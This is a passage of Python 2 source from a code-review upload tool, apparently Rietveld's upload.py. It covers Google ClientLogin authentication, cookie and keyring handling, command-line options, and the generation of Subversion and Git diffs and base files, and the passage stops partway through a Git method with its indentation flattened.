MAX_UPLOAD_SIZE = 900 * 1024
# Constants for version control names. Used by GuessVCSName.
VCS_GIT = "Git"
VCS_MERCURIAL = "Mercurial"
VCS_SUBVERSION = "Subversion"
VCS_UNKNOWN = "Unknown"
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = ['application/javascript', 'application/x-javascript',
'application/xml', 'application/x-freemind',
'application/x-sh']
VCS_ABBREVIATIONS = {
VCS_MERCURIAL.lower(): VCS_MERCURIAL,
"hg": VCS_MERCURIAL,
VCS_SUBVERSION.lower(): VCS_SUBVERSION,
"svn": VCS_SUBVERSION,
VCS_GIT.lower(): VCS_GIT,
}
# The result of parsing Subversion's [auto-props] setting.
svn_auto_props_map = None
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={},
save_cookies=False, account_type=AUTH_ACCOUNT_TYPE):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
account_type: Account type used for authentication. Defaults to
AUTH_ACCOUNT_TYPE.
"""
self.host = host
if (not self.host.startswith("http://") and
not self.host.startswith("https://")):
self.host = "http://" + self.host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.account_type = account_type
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = self.account_type
if self.host.endswith(".google.com"):
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=")
for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg,
e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("%s/_ah/login?%s" %
(self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg,
response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.\n"
"If you are using a Google Apps account the URL is:\n"
"https://www.google.com/a/yourdomain.com/UnlockCaptcha")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, ("The user's access to the service has been "
"disabled.")
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
extra_headers=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
extra_headers: Dict containing additional HTTP headers that should be
included in the request (string header names mapped to their values),
or None to not include any additional headers.
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
if extra_headers:
for header, value in extra_headers.items():
req.add_header(header, value)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
## elif e.code >= 500 and e.code < 600:
## # Server Error - try again.
## continue
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies")
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" %
self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
# Don't save cookies across runs of update.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
parser = optparse.OptionParser(usage="%prog [options] [-- diff_options]")
parser.add_option("-y", "--assume_yes", action="store_true",
dest="assume_yes", default=False,
help="Assume that the answer to yes/no questions is 'yes'.")
# Logging
group = parser.add_option_group("Logging options")
group.add_option("-q", "--quiet", action="store_const", const=0,
dest="verbose", help="Print errors only.")
group.add_option("-v", "--verbose", action="store_const", const=2,
dest="verbose", default=1,
help="Print info level logs (default).")
group.add_option("--noisy", action="store_const", const=3,
dest="verbose", help="Print all logs.")
# Review server
group = parser.add_option_group("Review server options")
group.add_option("-s", "--server", action="store", dest="server",
default=DEFAULT_REVIEW_SERVER,
metavar="SERVER",
help=("The server to upload to. The format is host[:port]. "
"Defaults to '%default'."))
group.add_option("-e", "--email", action="store", dest="email",
metavar="EMAIL", default=None,
help="The username to use. Will prompt if omitted.")
group.add_option("-H", "--host", action="store", dest="host",
metavar="HOST", default=None,
help="Overrides the Host header sent with all RPCs.")
group.add_option("--no_cookies", action="store_false",
dest="save_cookies", default=True,
help="Do not save authentication cookies to local disk.")
group.add_option("--account_type", action="store", dest="account_type",
metavar="TYPE", default=AUTH_ACCOUNT_TYPE,
choices=["GOOGLE", "HOSTED"],
help=("Override the default account type "
"(defaults to '%default', "
"valid choices are 'GOOGLE' and 'HOSTED')."))
# Issue
group = parser.add_option_group("Issue options")
group.add_option("-d", "--description", action="store", dest="description",
metavar="DESCRIPTION", default=None,
help="Optional description when creating an issue.")
group.add_option("-f", "--description_file", action="store",
dest="description_file", metavar="DESCRIPTION_FILE",
default=None,
help="Optional path of a file that contains "
"the description when creating an issue.")
group.add_option("-r", "--reviewers", action="store", dest="reviewers",
metavar="REVIEWERS", default=None,
help="Add reviewers (comma separated email addresses).")
group.add_option("--cc", action="store", dest="cc",
metavar="CC", default=None,
help="Add CC (comma separated email addresses).")
group.add_option("--private", action="store_true", dest="private",
default=False,
help="Make the issue restricted to reviewers and those CCed")
# Upload options
group = parser.add_option_group("Patch options")
group.add_option("-m", "--message", action="store", dest="message",
metavar="MESSAGE", default=None,
help="A message to identify the patch. "
"Will prompt if omitted.")
group.add_option("-i", "--issue", type="int", action="store",
metavar="ISSUE", default=None,
help="Issue number to which to add. Defaults to new issue.")
group.add_option("--base_url", action="store", dest="base_url", default=None,
help="Base repository URL (listed as \"Base URL\" when "
"viewing issue). If omitted, will be guessed automatically "
"for SVN repos and left blank for others.")
group.add_option("--download_base", action="store_true",
dest="download_base", default=False,
help="Base files will be downloaded by the server "
"(side-by-side diffs may not work on files with CRs).")
group.add_option("--rev", action="store", dest="revision",
metavar="REV", default=None,
help="Base revision/branch/tree to diff against. Use "
"rev1:rev2 range to review already committed changeset.")
group.add_option("--send_mail", action="store_true",
dest="send_mail", default=False,
help="Send notification email to reviewers.")
group.add_option("--vcs", action="store", dest="vcs",
metavar="VCS", default=None,
help=("Version control system (optional, usually upload.py "
"already guesses the right VCS)."))
group.add_option("--emulate_svn_auto_props", action="store_true",
dest="emulate_svn_auto_props", default=False,
help=("Emulate Subversion's auto properties feature."))
def GetRpcServer(server, email=None, host_override=None, save_cookies=True,
account_type=AUTH_ACCOUNT_TYPE):
"""Returns an instance of an AbstractRpcServer.
Args:
server: String containing the review server URL.
email: String containing user's email address.
host_override: If not None, string containing an alternate hostname to use
in the host header.
save_cookies: Whether authentication cookies should be saved to disk.
account_type: Account type for authentication, either 'GOOGLE'
or 'HOSTED'. Defaults to AUTH_ACCOUNT_TYPE.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
# If this is the dev_appserver, use fake authentication.
host = (host_override or server).lower()
if host == "localhost" or host.startswith("localhost:"):
if email is None:
email = "[email protected]"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
server,
lambda: (email, "password"),
host_override=host_override,
extra_headers={"Cookie":
'dev_appserver_login="%s:False"' % email},
save_cookies=save_cookies,
account_type=account_type)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
def GetUserCredentials():
"""Prompts the user for a username and password."""
# Create a local alias to the email variable to avoid Python's crazy
# scoping rules.
local_email = email
if local_email is None:
local_email = GetEmail("Email (login for uploading to %s)" % server)
password = None
if keyring:
password = keyring.get_password(host, local_email)
if password is not None:
print "Using password from system keyring."
else:
password = getpass.getpass("Password for %s: " % local_email)
if keyring:
answer = raw_input("Store password in system keyring?(y/N) ").strip()
if answer == "y":
keyring.set_password(host, local_email, password)
return (local_email, password)
return rpc_server_class(server,
GetUserCredentials,
host_override=host_override,
save_cookies=save_cookies)
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
if isinstance(value, unicode):
value = value.encode('utf-8')
lines.append(value)
for (key, filename, value) in files:
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
if isinstance(value, unicode):
value = value.encode('utf-8')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True,
env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines,
env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output,
universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def PostProcessDiff(self, diff):
"""Return the diff with any special post processing this VCS needs, e.g.
to include an svn-style "Index:"."""
return diff
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = filename.strip().replace('\\', '/')
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields,
[("data", filename, content)])
response_body = rpc_server.Send(url, body,
content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
UploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
UploadFile(filename, file_id, new_content, is_binary, status, False)
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class SubversionVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Subversion."""
def __init__(self, options):
super(SubversionVCS, self).__init__(options)
if self.options.revision:
match = re.match(r"(\d+)(:(\d+))?", self.options.revision)
if not match:
ErrorExit("Invalid Subversion revision %s." % self.options.revision)
self.rev_start = match.group(1)
self.rev_end = match.group(3)
else:
self.rev_start = self.rev_end = None
# Cache output from "svn list -r REVNO dirname".
# Keys: dirname, Values: 2-tuple (ouput for start rev and end rev).
self.svnls_cache = {}
# Base URL is required to fetch files deleted in an older revision.
# Result is cached to not guess it over and over again in GetBaseFile().
required = self.options.download_base or self.options.revision is not None
self.svn_base = self._GuessBase(required)
def GuessBase(self, required):
"""Wrapper for _GuessBase."""
return self.svn_base
def _GuessBase(self, required):
"""Returns the SVN base URL.
Args:
required: If true, exits if the url can't be guessed, otherwise None is
returned.
"""
info = RunShell(["svn", "info"])
for line in info.splitlines():
words = line.split()
if len(words) == 2 and words[0] == "URL:":
url = words[1]
scheme, netloc, path, params, query, fragment = urlparse.urlparse(url)
username, netloc = urllib.splituser(netloc)
if username:
logging.info("Removed username from base URL")
if netloc.endswith("svn.python.org"):
if netloc == "svn.python.org":
if path.startswith("/projects/"):
path = path[9:]
elif netloc != "[email protected]":
ErrorExit("Unrecognized Python URL: %s" % url)
base = "http://svn.python.org/view/*checkout*%s/" % path
logging.info("Guessed Python base = %s", base)
elif netloc.endswith("svn.collab.net"):
if path.startswith("/repos/"):
path = path[6:]
base = "http://svn.collab.net/viewvc/*checkout*%s/" % path
logging.info("Guessed CollabNet base = %s", base)
elif netloc.endswith(".googlecode.com"):
path = path + "/"
base = urlparse.urlunparse(("http", netloc, path, params,
query, fragment))
logging.info("Guessed Google Code base = %s", base)
else:
path = path + "/"
base = urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
logging.info("Guessed base = %s", base)
return base
if required:
ErrorExit("Can't find URL in output from svn info")
return None
def GenerateDiff(self, args):
cmd = ["svn", "diff"]
if self.options.revision:
cmd += ["-r", self.options.revision]
cmd.extend(args)
data = RunShell(cmd)
count = 0
for line in data.splitlines():
if line.startswith("Index:") or line.startswith("Property changes on:"):
count += 1
logging.info(line)
if not count:
ErrorExit("No valid patches found in output from svn diff")
return data
def _CollapseKeywords(self, content, keyword_str):
"""Collapses SVN keywords."""
# svn cat translates keywords but svn diff doesn't. As a result of this
# behavior patching.PatchChunks() fails with a chunk mismatch error.
# This part was originally written by the Review Board development team
# who had the same problem (http://reviews.review-board.org/r/276/).
# Mapping of keywords to known aliases
svn_keywords = {
# Standard keywords
'Date': ['Date', 'LastChangedDate'],
'Revision': ['Revision', 'LastChangedRevision', 'Rev'],
'Author': ['Author', 'LastChangedBy'],
'HeadURL': ['HeadURL', 'URL'],
'Id': ['Id'],
# Aliases
'LastChangedDate': ['LastChangedDate', 'Date'],
'LastChangedRevision': ['LastChangedRevision', 'Rev', 'Revision'],
'LastChangedBy': ['LastChangedBy', 'Author'],
'URL': ['URL', 'HeadURL'],
}
def repl(m):
if m.group(2):
return "$%s::%s$" % (m.group(1), " " * len(m.group(3)))
return "$%s$" % m.group(1)
keywords = [keyword
for name in keyword_str.split(" ")
for keyword in svn_keywords.get(name, [])]
return re.sub(r"\$(%s):(:?)([^\$]+)\$" % '|'.join(keywords), repl, content)
def GetUnknownFiles(self):
status = RunShell(["svn", "status", "--ignore-externals"], silent_ok=True)
unknown_files = []
for line in status.split("\n"):
if line and line[0] == "?":
unknown_files.append(line)
return unknown_files
def ReadFile(self, filename):
"""Returns the contents of a file."""
file = open(filename, 'rb')
result = ""
try:
result = file.read()
finally:
file.close()
return result
def GetStatus(self, filename):
"""Returns the status of a file."""
if not self.options.revision:
status = RunShell(["svn", "status", "--ignore-externals", filename])
if not status:
ErrorExit("svn status returned no output for %s" % filename)
status_lines = status.splitlines()
# If file is in a cl, the output will begin with
# "\n--- Changelist 'cl_name':\n". See
# http://svn.collab.net/repos/svn/trunk/notes/changelist-design.txt
if (len(status_lines) == 3 and
not status_lines[0] and
status_lines[1].startswith("--- Changelist")):
status = status_lines[2]
else:
status = status_lines[0]
# If we have a revision to diff against we need to run "svn list"
# for the old and the new revision and compare the results to get
# the correct status for a file.
else:
dirname, relfilename = os.path.split(filename)
if dirname not in self.svnls_cache:
cmd = ["svn", "list", "-r", self.rev_start, dirname or "."]
out, returncode = RunShellWithReturnCode(cmd)
if returncode:
ErrorExit("Failed to get status for %s." % filename)
old_files = out.splitlines()
args = ["svn", "list"]
if self.rev_end:
args += ["-r", self.rev_end]
cmd = args + [dirname or "."]
out, returncode = RunShellWithReturnCode(cmd)
if returncode:
ErrorExit("Failed to run command %s" % cmd)
self.svnls_cache[dirname] = (old_files, out.splitlines())
old_files, new_files = self.svnls_cache[dirname]
if relfilename in old_files and relfilename not in new_files:
status = "D "
elif relfilename in old_files and relfilename in new_files:
status = "M "
else:
status = "A "
return status
def GetBaseFile(self, filename):
status = self.GetStatus(filename)
base_content = None
new_content = None
# If a file is copied its status will be "A +", which signifies
# "addition-with-history". See "svn st" for more information. We need to
# upload the original file or else diff parsing will fail if the file was
# edited.
if status[0] == "A" and status[3] != "+":
# We'll need to upload the new content if we're adding a binary file
# since diff's output won't contain it.
mimetype = RunShell(["svn", "propget", "svn:mime-type", filename],
silent_ok=True)
base_content = ""
is_binary = bool(mimetype) and not mimetype.startswith("text/")
if is_binary and self.IsImage(filename):
new_content = self.ReadFile(filename)
elif (status[0] in ("M", "D", "R") or
(status[0] == "A" and status[3] == "+") or # Copied file.
(status[0] == " " and status[1] == "M")): # Property change.
args = []
if self.options.revision:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
else:
# Don't change filename, it's needed later.
url = filename
args += ["-r", "BASE"]
cmd = ["svn"] + args + ["propget", "svn:mime-type", url]
mimetype, returncode = RunShellWithReturnCode(cmd)
if returncode:
# File does not exist in the requested revision.
# Reset mimetype, it contains an error message.
mimetype = ""
get_base = False
is_binary = bool(mimetype) and not mimetype.startswith("text/")
if status[0] == " ":
# Empty base content just to force an upload.
base_content = ""
elif is_binary:
if self.IsImage(filename):
get_base = True
if status[0] == "M":
if not self.rev_end:
new_content = self.ReadFile(filename)
else:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_end)
new_content = RunShell(["svn", "cat", url],
universal_newlines=True, silent_ok=True)
else:
base_content = ""
else:
get_base = True
if get_base:
if is_binary:
universal_newlines = False
else:
universal_newlines = True
if self.rev_start:
# "svn cat -r REV delete_file.txt" doesn't work. cat requires
# the full URL with "@REV" appended instead of using "-r" option.
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
base_content = RunShell(["svn", "cat", url],
universal_newlines=universal_newlines,
silent_ok=True)
else:
base_content, ret_code = RunShellWithReturnCode(
["svn", "cat", filename], universal_newlines=universal_newlines)
if ret_code and status[0] == "R":
# It's a replaced file without local history (see issue208).
# The base file needs to be fetched from the server.
url = "%s/%s" % (self.svn_base, filename)
base_content = RunShell(["svn", "cat", url],
universal_newlines=universal_newlines,
silent_ok=True)
elif ret_code:
ErrorExit("Got error status from 'svn cat %s'", filename)
if not is_binary:
args = []
if self.rev_start:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
else:
url = filename
args += ["-r", "BASE"]
cmd = ["svn"] + args + ["propget", "svn:keywords", url]
keywords, returncode = RunShellWithReturnCode(cmd)
if keywords and not returncode:
base_content = self._CollapseKeywords(base_content, keywords)
else:
StatusUpdate("svn status returned unexpected output: %s" % status)
sys.exit(1)
return base_content, new_content, is_binary, status[0:5]
class GitVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Git."""
def __init__(self, options):
super(GitVCS, self).__init__(options)
# Map of filename -> (hash before, hash after) of base file.
# Hashes for "no such file" are represented as None.
self.hashes = {}
# Map of new filename -> old filename for renames.
self.renames = {}
def PostProcessDiff(self, gitdiff):
"""Converts the diff output to include an svn-style "Index:" line as well
as record the hashes of the files, so we can upload them along with our
diff."""
# Special used by git to indicate "no such content".
NULL_HASH = "0"*40
def IsFileNew(filename):
return filename in self.hashes and self.hashes[filename][0] is None
def AddSubversionPropertyChange(filename):
"""Add svn's property change information into the patch if given file is
new file.
We use Subversion's auto-props setting to retrieve its property.
See http://svnbook.red-bean.com/en/1.1/ch07.html#svn-ch-7-sect-1.3.2 for
Subversion's [auto-props] setting.
"""
if self.options.emulate_svn_auto_props and IsFileNew(filename):
svnprops = GetSubversionPropertyChanges(filename)
if svnprops:
svndiff.append("\n" + svnprops + "\n")
svndiff = []
filecount = 0
filename = None
for line in gitdiff.splitlines():
match = re.match(r"diff --git a/(.*) b/(.*)$", line)
if match:
# Add auto property here for previously seen file.
if filename is not None:
AddSubversionPropertyChange(filename)
filecount += 1
# Intentionally use the "after" filename so we can show renames.
filename = match.group(2)
svndiff.append("Index: %s\n" % filename)
if match.group(1) != match.group(2):
self.renames[match.group(2)] = match.group(1)
else:
# The "index" line in a git diff looks like this (long hashes elided):
# index 82c0d44..b2cee3f 100755
# We want to save the left hash, as that identifies the base file.
match = re.match(r"index (\w+)\.\.(\w+)", line)
if match:
before, after = (match.group(1), match.group(2))
if before == NULL_HASH:
before = None
if after == NULL_HASH:
after = None
self.hashes[filename] = (before, after)
svndiff.append(line + "\n")
if not filecount:
ErrorExit("No valid patches found in output from git diff")
# Add auto property for the last seen file.
assert filename is not None
AddSubversionPropertyChange(filename)
return "".join(svndiff)
def GenerateDiff(self, extra_args):
extra_args = extra_args[:]
if self.options.revision:
extra_args = [self.options.revision] + extra_args
# --no-ext-diff is broken in some versions of Git, so try to work around
# this by overriding the environment (but there is still a problem if the
# git config key "diff.external" is used).
env = os.environ.copy()
if 'GIT_EXTERNAL_DIFF' in env: del env['GIT_EXTERNAL_DIFF']
return RunShell(["git", "diff", "--no-ext-diff", "--full-index", "-M"]
+ extra_args, env=env)
def GetUnknownFiles(self):
status = RunShell(["git", "ls-files", "--exclude-standard", "--others"],
silent_ok=True)
return status.splitlines()
def GetFileContent(self, file_hash, is_binary):
"""Returns the content of a file identified by its git hash."""
data, retcode = RunShellWithReturnCode(["git", "show", file_hash],
universal_newlines=not is_binary)
if retcode:
ErrorExit("Got error status from 'git show %s'" % file_hash)
return data
def GetBaseFile(self, filename):
hash_before, hash_after = self.hashes.get(filename, (None,None))
base_content = None
new_content = None
